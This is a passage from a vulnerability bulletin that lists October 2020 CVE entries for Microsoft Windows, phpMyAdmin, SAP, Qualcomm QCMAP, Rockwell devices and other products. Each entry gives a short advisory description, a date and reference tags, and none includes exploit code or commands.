A remote code execution vulnerability exists in Visual Studio Code when a user is tricked into opening a malicious ‘package.json’ file, aka ‘Visual Studio JSON Remote Code Execution Vulnerability’. 2020-10-16 not yet calculated CVE-2020-17023
MISC
microsoft — windows
 
An elevation of privilege vulnerability exists when Microsoft Windows improperly handles reparse points, aka ‘Windows Elevation of Privilege Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16877
MISC
microsoft — windows_10 A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory, aka ‘Media Foundation Memory Corruption Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16915
MISC
microsoft — windows_10 An information disclosure vulnerability exists in Remote Desktop Protocol (RDP) when an attacker connects to the target system using RDP and sends specially crafted requests, aka ‘Windows Remote Desktop Protocol (RDP) Information Disclosure Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16896
MISC
microsoft — windows_10 A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka ‘Jet Database Engine Remote Code Execution Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16924
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists when Windows improperly handles COM object creation, aka ‘Windows COM Server Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16916. 2020-10-16 not yet calculated CVE-2020-16935
MISC
microsoft — windows_10 A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory, aka ‘Microsoft Graphics Components Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16923. 2020-10-16 not yet calculated CVE-2020-1167
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists when the Windows Application Compatibility Client Library improperly handles registry operations, aka ‘Windows Application Compatibility Client Library Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16876. 2020-10-16 not yet calculated CVE-2020-16920
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Backup Service Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16912, CVE-2020-16936, CVE-2020-16972, CVE-2020-16973, CVE-2020-16975, CVE-2020-16976. 2020-10-16 not yet calculated CVE-2020-16974
MISC
microsoft — windows_10
 
An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka ‘Windows Kernel Elevation of Privilege Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16890
MISC
microsoft — windows_10
 
An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka ‘Win32k Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16913. 2020-10-16 not yet calculated CVE-2020-16907
MISC
microsoft — windows_10
 
An elevation of privilege vulnerability exists when Windows Error Reporting manager improperly handles a process crash, aka ‘Windows Error Reporting Manager Elevation of Privilege Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16895
MISC
microsoft — windows_10
 
An elevation of privilege vulnerability exists when the Windows User Profile Service (ProfSvc) improperly handles junction points, aka ‘Windows – User Profile Service Elevation of Privilege Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16940
MISC
microsoft — windows_10
 
A denial of service vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets, aka ‘Windows TCP/IP Denial of Service Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16899
MISC
microsoft — windows_10
 
A denial of service vulnerability exists when Microsoft Hyper-V on a host server fails to properly validate specific malicious data from a user on a guest operating system. To exploit the vulnerability, an attacker who already has a privileged account on a guest operating system, running as a virtual machine, could run a specially crafted application. The security update addresses the vulnerability by resolving the conditions where Hyper-V would fail to handle these requests, aka ‘Windows Hyper-V Denial of Service Vulnerability’. 2020-10-16 not yet calculated CVE-2020-1243
MISC
microsoft — windows_10
 
A remote code execution vulnerability exists when Windows Network Address Translation (NAT) fails to properly handle UDP traffic, aka ‘Windows NAT Remote Code Execution Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16894
MISC
microsoft — windows_10
 
An elevation of privilege vulnerability exists in the way that the Windows kernel image handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. To exploit the vulnerability, a locally authenticated attacker could run a specially crafted application. The security update addresses the vulnerability by ensuring the Windows kernel image properly handles objects in memory, aka ‘Windows Image Elevation of Privilege Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16892
MISC
microsoft — windows_10
 
A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system, aka ‘Windows Hyper-V Remote Code Execution Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16891
MISC
microsoft — windows_10
 
An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. To exploit this vulnerability, an authenticated attacker could run a specially crafted application, aka ‘Windows Kernel Information Disclosure Vulnerability’. This CVE ID is unique from CVE-2020-16938. 2020-10-16 not yet calculated CVE-2020-16901
MISC
microsoft — windows_10
 
A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory, aka ‘Microsoft Graphics Components Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-1167. 2020-10-16 not yet calculated CVE-2020-16923
MISC
microsoft — windows_10
 
An information disclosure vulnerability exists when the Windows KernelStream improperly handles objects in memory, aka ‘Windows KernelStream Information Disclosure Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16889
MISC
microsoft — windows_10
 
An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges, aka ‘Windows Installer Elevation of Privilege Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16902
MISC
microsoft — windows_10
 
An elevation of privilege vulnerability exists when the Windows Storage Services improperly handle file operations, aka ‘Windows Storage Services Elevation of Privilege Vulnerability’. 2020-10-16 not yet calculated CVE-2020-0764
MISC
microsoft — windows_10
 
An elevation of privilege vulnerability exists when Windows Hyper-V on a host server fails to properly handle objects in memory, aka ‘Windows Hyper-V Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-1080. 2020-10-16 not yet calculated CVE-2020-1047
MISC
microsoft — windows_10
 
An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory, aka ‘Windows Network Connections Service Elevation of Privilege Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16887
MISC
microsoft — windows_10
 
An elevation of privilege vulnerability exists when the Windows Storage VSP Driver improperly handles file operations, aka ‘Windows Storage VSP Driver Elevation of Privilege Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16885
MISC
microsoft — windows_10
 
An elevation of privilege vulnerability exists when Windows Hyper-V on a host server fails to properly handle objects in memory, aka ‘Windows Hyper-V Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-1047. 2020-10-16 not yet calculated CVE-2020-1080
MISC
microsoft — windows_10
 
An elevation of privilege vulnerability exists when the Windows Event System improperly handles objects in memory. To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Event System Elevation of Privilege Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16900
MISC
microsoft — windows_10
 
A remote code execution vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets, aka ‘Windows TCP/IP Remote Code Execution Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16898
MISC
microsoft — windows_10
 
An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Backup Service Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16912, CVE-2020-16936, CVE-2020-16972, CVE-2020-16974, CVE-2020-16975, CVE-2020-16976. 2020-10-16 not yet calculated CVE-2020-16973
MISC
microsoft — windows_10
 
An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files, aka ‘Windows Error Reporting Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16909. 2020-10-16 not yet calculated CVE-2020-16905
MISC
microsoft — windows_10
 
A spoofing vulnerability exists when Windows incorrectly validates file signatures, aka ‘Windows Spoofing Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16922
MISC
microsoft — windows_10
 
An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka ‘Win32k Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16907. 2020-10-16 not yet calculated CVE-2020-16913
MISC
microsoft — windows_10
 
An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Backup Service Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16912, CVE-2020-16972, CVE-2020-16973, CVE-2020-16974, CVE-2020-16975, CVE-2020-16976. 2020-10-16 not yet calculated CVE-2020-16936
MISC
microsoft — windows_10
 
An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Backup Service Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16912, CVE-2020-16936, CVE-2020-16973, CVE-2020-16974, CVE-2020-16975, CVE-2020-16976. 2020-10-16 not yet calculated CVE-2020-16972
MISC
microsoft — windows_10
 
An elevation of privilege vulnerability exists when Group Policy improperly checks access, aka ‘Group Policy Elevation of Privilege Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16939
MISC
microsoft — windows_10
 
An elevation of privilege vulnerability exists in Windows Setup in the way it handles directories. A locally authenticated attacker could run arbitrary code with elevated system privileges, aka ‘Windows Setup Elevation of Privilege Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16908
MISC
microsoft — windows_10
 
An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files, aka ‘Windows Error Reporting Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16905. 2020-10-16 not yet calculated CVE-2020-16909
MISC
microsoft — windows_10
 
A security feature bypass vulnerability exists when Microsoft Windows fails to handle file creation permissions, which could allow an attacker to create files in a protected Unified Extensible Firmware Interface (UEFI) location. To exploit this vulnerability, an attacker could run a specially crafted application to bypass Unified Extensible Firmware Interface (UEFI) variable security in Windows. The security update addresses the vulnerability by correcting security feature behavior to enforce permissions, aka ‘Windows Security Feature Bypass Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16910
MISC
microsoft — windows_10
 
A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory, aka ‘GDI+ Remote Code Execution Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16911
MISC
microsoft — windows_10
 
An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Backup Service Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16936, CVE-2020-16972, CVE-2020-16973, CVE-2020-16974, CVE-2020-16975, CVE-2020-16976. 2020-10-16 not yet calculated CVE-2020-16912
MISC
microsoft — windows_10
 
An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory, aka ‘Windows Kernel Information Disclosure Vulnerability’. This CVE ID is unique from CVE-2020-16901. 2020-10-16 not yet calculated CVE-2020-16938
MISC
microsoft — windows_10
 
An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface Plus (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system, aka ‘Windows GDI+ Information Disclosure Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16914
MISC
microsoft — windows_10
 
An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Backup Service Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16912, CVE-2020-16936, CVE-2020-16972, CVE-2020-16973, CVE-2020-16974, CVE-2020-16976. 2020-10-16 not yet calculated CVE-2020-16975
MISC
microsoft — windows_10
 
A remote code execution vulnerability exists when the Windows Camera Codec Pack improperly handles objects in memory, aka ‘Windows Camera Codec Pack Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16968. 2020-10-16 not yet calculated CVE-2020-16967
MISC
microsoft — windows_10
 
A denial of service vulnerability exists in Remote Desktop Protocol (RDP) when an attacker connects to the target system using RDP and sends specially crafted requests, aka ‘Windows Remote Desktop Protocol (RDP) Denial of Service Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16927
MISC
microsoft — windows_10
 
An elevation of privilege vulnerability exists when Windows improperly handles COM object creation, aka ‘Windows COM Server Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16935. 2020-10-16 not yet calculated CVE-2020-16916
MISC
microsoft — windows_10
 
An information disclosure vulnerability exists when the Windows Enterprise App Management Service improperly handles certain file operations, aka ‘Windows Enterprise App Management Service Information Disclosure Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16919
MISC
microsoft — windows_10
 
A remote code execution vulnerability exists when the Windows Camera Codec Pack improperly handles objects in memory, aka ‘Windows Camera Codec Pack Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16967. 2020-10-16 not yet calculated CVE-2020-16968
MISC
microsoft — windows_10
 
An information disclosure vulnerability exists in Text Services Framework when it fails to properly handle objects in memory, aka ‘Windows Text Services Framework Information Disclosure Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16921
MISC
microsoft — windows_10
 
An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Backup Service Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16912, CVE-2020-16936, CVE-2020-16972, CVE-2020-16973, CVE-2020-16974, CVE-2020-16975. 2020-10-16 not yet calculated CVE-2020-16976
MISC
microsoft — windows_codecs_library
 
A remote code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory, aka ‘Microsoft Windows Codecs Library Remote Code Execution Vulnerability’. 2020-10-16 not yet calculated CVE-2020-17022
MISC
microsoft — windows_server
 
An elevation of privilege vulnerability exists when the Windows iSCSI Target Service improperly handles file operations, aka ‘Windows iSCSI Target Service Elevation of Privilege Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16980
MISC
microsoft — word
 
A security feature bypass vulnerability exists in Microsoft Word software when it fails to properly handle .LNK files, aka ‘Microsoft Word Security Feature Bypass Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16933
MISC
monero — monero_wallet_gui
 
monero-wallet-gui in Monero GUI 0.17.0.1 includes the . directory in an embedded RPATH (with a preference ahead of /usr/lib), which allows local users to gain privileges via a Trojan horse library in the current working directory. 2020-10-10 not yet calculated CVE-2020-26947
MISC
mybatis — mybatis
 
MyBatis before 3.5.6 mishandles deserialization of object streams. 2020-10-10 not yet calculated
MISC
MISC
netbios — netbios
 
An information disclosure vulnerability exists when NetBIOS over TCP (NBT) Extensions (NetBT) improperly handle objects in memory, aka ‘NetBT Information Disclosure Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16897
MISC
netgear — multiple_routers
 
This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of NETGEAR R6120, R6080, R6260, R6220, R6020, JNR3210, and WNR2020 routers with firmware 1.0.66. Authentication is not required to exploit this vulnerability. The specific flaw exists within the mini_httpd service, which listens on TCP port 80 by default. The issue results from incorrect string matching logic when accessing protected pages. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-10754. 2020-10-13 not yet calculated CVE-2020-17409
N/A
N/A
octopus — octopus_deploy
 
In Octopus Deploy 3.1.0 to 2020.4.0, certain scripts can reveal sensitive information to the user in the task logs. 2020-10-12 not yet calculated CVE-2020-25825
CONFIRM
CONFIRM
CONFIRM
CONFIRM
olimpoks — olimpoks
 
OLIMPOKS before 5.1.0 allows Auth/Admin ErrorMessage XSS. 2020-10-16 not yet calculated CVE-2020-16270
MISC
MISC
open_enclave — open_enclave
 
In Open Enclave before version 0.12.0, an information disclosure vulnerability exists when an enclave application using the syscalls provided by the sockets.edl is loaded by a malicious host application. An attacker who successfully exploited the vulnerability could read privileged data from the enclave heap across trust boundaries. To exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application. The vulnerability would not allow an attacker to elevate user rights directly, but it could be used to obtain information otherwise considered confidential in an enclave, which could be used in further compromises. The issue has been addressed in version 0.12.0 and the current master branch. Users will need to recompile their applications against the patched libraries to be protected from this vulnerability. 2020-10-14 not yet calculated CVE-2020-15224
MISC
MISC
CONFIRM
openstack — blazer_dashboard
 
An issue was discovered in OpenStack blazar-dashboard before 1.3.1, 2.0.0, and 3.0.0. A user allowed to access the Blazar dashboard in Horizon may trigger code execution on the Horizon host as the user the Horizon service runs under (because the Python eval function is used). This may result in Horizon host unauthorized access and further compromise of the Horizon service. All setups using the Horizon dashboard with the blazar-dashboard plugin are affected. 2020-10-16 not yet calculated CVE-2020-26943
MLIST
MISC
MISC
MISC
MISC
MISC
MISC
CONFIRM
opensuse — powerdns_recursor
 
An issue has been found in PowerDNS Recursor before 4.1.18, 4.2.x before 4.2.5, and 4.3.x before 4.3.5. A remote attacker can cause the cached records for a given name to be updated to the Bogus DNSSEC validation state, instead of their actual DNSSEC Secure state, via a DNS ANY query. This results in a denial of service for installations that always validate (dnssec=validate), and for clients requesting validation when on-demand validation is enabled (dnssec=process). 2020-10-16 not yet calculated CVE-2020-25829
SUSE
CONFIRM
otrs — open_ticket_request_system Names of agents who participate in a chat conversation are revealed in certain parts of the external interface, as well as in chat transcriptions inside the tickets, when the system is configured to mask real agent names. This issue affects OTRS 7.0.21 and prior versions, and 8.0.6 and prior versions. 2020-10-15 not yet calculated CVE-2020-1777
CONFIRM
overwolf — overwolf_client
 
In the client in Overwolf 0.149.2.30, a channel can be accessed or influenced by an actor that is not an endpoint. 2020-10-16 not yet calculated CVE-2020-25214
MISC
pepperl_+_fuchs — comtrol_rocketlinx
 
Improper Authorization vulnerability of Pepperl+Fuchs P+F Comtrol RocketLinx ES7510-XT, ES8509-XT, ES8510-XT, ES9528-XTv2, ES7506, ES7510, ES7528, ES8508, ES8508F, ES8510, ES8510-XTE, ES9528/ES9528-XT (all versions) and ICRL-M-8RJ45/4SFP-G-DIN, ICRL-M-16RJ45/4CP-G-DIN FW 1.2.3 and below is prone to unauthenticated device administration. 2020-10-15 not yet calculated CVE-2020-12502
CONFIRM
pepperl_+_fuchs — comtrol_rocketlinx
 
Improper Authorization vulnerability of Pepperl+Fuchs P+F Comtrol RocketLinx ES7510-XT, ES8509-XT, ES8510-XT, ES9528-XTv2, ES7506, ES7510, ES7528, ES8508, ES8508F, ES8510, ES8510-XTE, ES9528/ES9528-XT (all versions) use undocumented accounts. 2020-10-15 not yet calculated CVE-2020-12501
CONFIRM
pepperl_+_fuchs — comtrol_rocketlinx
 
Improper Authorization vulnerability of Pepperl+Fuchs P+F Comtrol RocketLinx ES7510-XT, ES8509-XT, ES8510-XT, ES9528-XTv2, ES7506, ES7510, ES7528, ES8508, ES8508F, ES8510, ES8510-XTE, ES9528/ES9528-XT (all versions) and ICRL-M-8RJ45/4SFP-G-DIN, ICRL-M-16RJ45/4CP-G-DIN FW 1.2.3 and below is prone to multiple authenticated command injections. 2020-10-15 not yet calculated CVE-2020-12503
CONFIRM
pepperl_+_fuchs — comtrol_rocketlinx
 
Improper Authorization vulnerability of Pepperl+Fuchs P+F Comtrol RocketLinx ES7510-XT, ES8509-XT, ES8510-XT, ES9528-XTv2, ES7506, ES7510, ES7528, ES8508, ES8508F, ES8510, ES8510-XTE, ES9528/ES9528-XT (all versions) allows unauthenticated device administration. 2020-10-15 not yet calculated CVE-2020-12500
CONFIRM
pepperl_+_fuchs — comtrol_rocketlinx
 
Improper Authorization vulnerability of Pepperl+Fuchs P+F Comtrol RocketLinx ES7510-XT, ES8509-XT, ES8510-XT, ES9528-XTv2, ES7506, ES7510, ES7528, ES8508, ES8508F, ES8510, ES8510-XTE, ES9528/ES9528-XT (all versions) and ICRL-M-8RJ45/4SFP-G-DIN, ICRL-M-16RJ45/4CP-G-DIN FW 1.2.3 and below has an active TFTP-Service. 2020-10-15 not yet calculated CVE-2020-12504
CONFIRM
phpmyadmin — phpmyadmin
 
An issue was discovered in SearchController in phpMyAdmin before 4.9.6 and 5.x before 5.0.3. A SQL injection vulnerability was discovered in how phpMyAdmin processes SQL statements in the search feature. An attacker could use this flaw to inject malicious SQL into a query. 2020-10-10 not yet calculated CVE-2020-26935
SUSE
MISC
phpmyadmin — phpmyadmin
 
phpMyAdmin before 4.9.6 and 5.x before 5.0.3 allows XSS through the transformation feature via a crafted link. 2020-10-10 not yet calculated CVE-2020-26934
SUSE
MISC
phpredisadmin — phpredisadmin
 
phpRedisAdmin before 1.13.2 allows XSS via the login.php username parameter. 2020-10-16 not yet calculated CVE-2020-27163
MISC
qemu — qemu
 
An issue was discovered in QEMU through 5.1.0. An out-of-bounds memory access was found in the ATI VGA device implementation. This flaw occurs in the ati_2d_blt() routine in hw/display/ati_2d.c while handling MMIO write operations through the ati_mm_write() callback. A malicious guest could use this flaw to crash the QEMU process on the host, resulting in a denial of service. 2020-10-16 not yet calculated CVE-2020-24352
MISC
MISC
qualcomm — qcmap
 
The QCMAP_CLI utility in the Qualcomm QCMAP software suite prior to versions released in October 2020 uses a system() call without validating the input, while handling a SetGatewayUrl() request. A local attacker with shell access can pass shell metacharacters and run arbitrary commands. If QCMAP_CLI can be run via sudo or setuid, this also allows elevating privileges to root. This version of QCMAP is used in many kinds of networking devices, primarily mobile hotspots and LTE routers. 2020-10-15 not yet calculated CVE-2020-25859
MISC
qualcomm — qcmap
 
The QCMAP_Web_CLIENT binary in the Qualcomm QCMAP software suite prior to versions released in October 2020 does not validate the return value of a strstr() or strchr() call in the Tokenizer() function. An attacker who invokes the web interface with a crafted URL can crash the process, causing denial of service. This version of QCMAP is used in many kinds of networking devices, primarily mobile hotspots and LTE routers. 2020-10-15 not yet calculated CVE-2020-25858
MISC
rapid7 — nexpose
 
A SQL Injection issue in Rapid7 Nexpose versions prior to 6.6.49 may have allowed an authenticated user with a low permission level to access resources and make changes they should not have been able to access. 2020-10-14 not yet calculated CVE-2020-7383
MISC
red_hat — jboss_eap
 
A flaw was found in JBoss EAP, where the authentication configuration is set-up using a legacy SecurityRealm, to delegate to a legacy PicketBox SecurityDomain, and then reloaded to admin-only mode. This flaw allows an attacker to perform a complete authentication bypass by using an arbitrary user and password. The highest threat to vulnerability is to system availability. 2020-10-16 not yet calculated CVE-2020-14299
MISC
rockwell_automation — allen-bradley_flex_io_1794-aent/b An exploitable denial of service vulnerability exists in the ENIP Request Path Port Segment functionality of Allen-Bradley Flex IO 1794-AENT/B. A specially crafted network request can cause a loss of communications with the device resulting in denial-of-service. An attacker can send a malicious packet to trigger this vulnerability. 2020-10-14 not yet calculated CVE-2020-6083
MISC
rockwell_automation — allen-bradley_flex_io_1794-aent/b
 
An exploitable denial of service vulnerability exists in the ENIP Request Path Data Segment functionality of Allen-Bradley Flex IO 1794-AENT/B. A specially crafted network request can cause a loss of communications with the device resulting in denial-of-service. An attacker can send a malicious packet to trigger this vulnerability. If the Simple Segment Sub-Type is supplied, the device treats the byte following as the Data Size in words. When this value represents a size greater than what remains in the packet data, the device enters a fault state where communication with the device is lost and a physical power cycle is required. 2020-10-14 not yet calculated CVE-2020-6086
MISC
rockwell_automation — allen-bradley_flex_io_1794-aent/b
 
An exploitable denial of service vulnerability exists in the ENIP Request Path Data Segment functionality of Allen-Bradley Flex IO 1794-AENT/B. A specially crafted network request can cause a loss of communications with the device resulting in denial-of-service. An attacker can send a malicious packet to trigger this vulnerability. If the ANSI Extended Symbol Segment Sub-Type is supplied, the device treats the byte following as the Data Size in words. When this value represents a size greater than what remains in the packet data, the device enters a fault state where communication with the device is lost and a physical power cycle is required. 2020-10-14 not yet calculated CVE-2020-6087
MISC
ros_comm — openrobotics
 
Integer Overflow or Wraparound vulnerability in the XML RPC library of OpenRobotics ros_comm communications packages allows unauthenticated network traffic to cause unexpected behavior. This issue affects: OpenRobotics ros_comm communications packages Noetic and prior versions. Fixed in https://github.com/ros/ros_comm/pull/2065. 2020-10-13 not yet calculated CVE-2020-16124
CONFIRM
sage — dpw
 
An issue was discovered in Sage DPW 2020_06_x before 2020_06_002. The search field “Kurs suchen” on the page Kurskatalog is vulnerable to Reflected XSS. If the attacker can lure a user into clicking a crafted link, he can execute arbitrary JavaScript code in the user’s browser. The vulnerability can be used to change the contents of the displayed site, redirect to other sites, or steal user credentials. Additionally, users are potential victims of browser exploits and JavaScript malware. 2020-10-16 not yet calculated CVE-2020-26584
MISC
MISC
MISC
sage — dpw
 
An issue was discovered in Sage DPW 2020_06_x before 2020_06_002. It allows unauthenticated users to upload JavaScript (in a file) via the expenses claiming functionality. However, to view the file, authentication is required. By exploiting this vulnerability, an attacker can persistently include arbitrary HTML or JavaScript code into the affected web page. The vulnerability can be used to change the contents of the displayed site, redirect to other sites, or steal user credentials. Additionally, users are potential victims of browser exploits and JavaScript malware. 2020-10-16 not yet calculated CVE-2020-26583
MISC
MISC
MISC
samsung — samsung
 
Samsung Update 3.0.2.0 ~ 3.0.32.0 has a vulnerability that allows privilege escalation, as commands crafted by an attacker are executed while the engine deserializes the data received during inter-process communication. 2020-10-12 not yet calculated CVE-2020-7811
MISC
sap — 3d_visual_enterprise_viewer
 
SAP 3D Visual Enterprise Viewer, version – 9, allows a user to open manipulated PDF file received from untrusted sources which results in crashing of the application and becoming temporarily unavailable until the user restarts the application, this is caused due to Improper Input Validation. 2020-10-15 not yet calculated CVE-2020-6372
MISC
MISC
sap — 3d_visual_enterprise_viewer
 
SAP 3D Visual Enterprise Viewer, version – 9, allows a user to open manipulated Right Hemisphere Binary (.rh) file received from untrusted sources which results in crashing of the application and becoming temporarily unavailable until the user restarts the application, this is caused due to Improper Input Validation. 2020-10-15 not yet calculated CVE-2020-6376
MISC
MISC
sap — 3d_visual_enterprise_viewer
 
SAP 3D Visual Enterprise Viewer, version – 9, allows a user to open manipulated Right Computer Graphics Metafile (.cgm) file received from untrusted sources which results in crashing of the application and becoming temporarily unavailable until the user restarts the application, this is caused due to Improper Input Validation. 2020-10-15 not yet calculated CVE-2020-6375
MISC
MISC
sap — 3d_visual_enterprise_viewer
 
SAP 3D Visual Enterprise Viewer, version – 9, allows a user to open manipulated Jupiter Tessellation (.jt) file received from untrusted sources which results in crashing of the application and becoming temporarily unavailable until the user restarts the application, this is caused due to Improper Input Validation. 2020-10-15 not yet calculated CVE-2020-6374
MISC
MISC
sap — 3d_visual_enterprise_viewer
 
SAP 3D Visual Enterprise Viewer, version – 9, allows a user to open manipulated PDF file received from untrusted sources which results in crashing of the application and becoming temporarily unavailable until the user restarts the application, this is caused due to Improper Input Validation. 2020-10-15 not yet calculated CVE-2020-6373
MISC
MISC
sap — business_planning_and_consolidation
 
SAP Business Planning and Consolidation, versions – 750, 751, 752, 753, 754, 755, 810, 100, 200, can be abused by an attacker, allowing them to modify displayed application content without authorization, and to potentially obtain authentication information from other legitimate users, leading to Cross Site Scripting. 2020-10-15 not yet calculated CVE-2020-6368
MISC
MISC
sap — commerce_cloud
 
SAP Commerce Cloud versions – 1808, 1811, 1905, 2005, does not sufficiently encode user inputs, which allows an authenticated and authorized content manager to inject malicious script into several web CMS components. These can be saved and later triggered, if an affected web page is visited, resulting in Cross-Site Scripting (XSS) vulnerability. 2020-10-15 not yet calculated CVE-2020-6272
MISC
MISC
sap — commerce_cloud
 
SAP Commerce Cloud, versions – 1808, 1811, 1905, 2005, exposes several web applications that maintain sessions with a user. These sessions are established after the user has authenticated with username/passphrase credentials. The user can change their own passphrase, but this does not invalidate active sessions that the user may have with SAP Commerce Cloud web applications, which gives an attacker the opportunity to reuse old session credentials, resulting in Insufficient Session Expiration. 2020-10-15 not yet calculated CVE-2020-6363
MISC
MISC
sap — netweaver_application_server
 
SAP NetWeaver Application Server Java, versions – 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, and 7.50 allows an unauthenticated attacker to include JavaScript blocks in any web page or URL with different symbols which are otherwise not allowed. On successful exploitation an attacker can steal authentication information of the user, such as data relating to his or her current session and limitedly impact confidentiality and integrity of the application, leading to Reflected Cross Site Scripting. 2020-10-15 not yet calculated CVE-2020-6319
MISC
MISC
sap — netweaver_application_server
 
User enumeration vulnerability can be exploited to get a list of user accounts and personal user information can be exposed in SAP NetWeaver Application Server ABAP (POWL test application) versions – 710, 711, 730, 731, 740, 750, leading to Information Disclosure. 2020-10-15 not yet calculated CVE-2020-6371
MISC
MISC
sap — netweaver_as_java
 
SAP NetWeaver AS Java, versions – 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, Start Page allows an unauthenticated remote attacker to redirect users to a malicious site due to insufficient reverse tabnabbing URL validation. The attacker could execute phishing attacks to steal credentials of the victim or to redirect users to untrusted web pages containing malware or similar malicious exploits. 2020-10-15 not yet calculated CVE-2020-6365
MISC
MISC
sap — netweaver_enterprise_portal
 
SAP NetWeaver Enterprise Portal (Fiori Framework Page) versions – 7.50, 7.31, 7.40, does not sufficiently encode user-controlled inputs and allows an attacker on a valid session to create an XSS that will be both reflected immediately and also be persisted and returned in further access to the system, resulting in Cross Site Scripting. 2020-10-15 not yet calculated CVE-2020-6323
MISC
MISC
sap — solution_manager_and_sap_focused_run
 
SAP Solution Manager and SAP Focused Run (update provided in WILY_INTRO_ENTERPRISE 9.7, 10.1, 10.5, 10.7), allows an attacker to modify a cookie in a way that OS commands can be executed and potentially gain control over the host running the CA Introscope Enterprise Manager, leading to Code Injection. With this, the attacker is able to read and modify all system files and also impact system availability. 2020-10-15 not yet calculated CVE-2020-6364
MISC
MISC
siport — mp
 
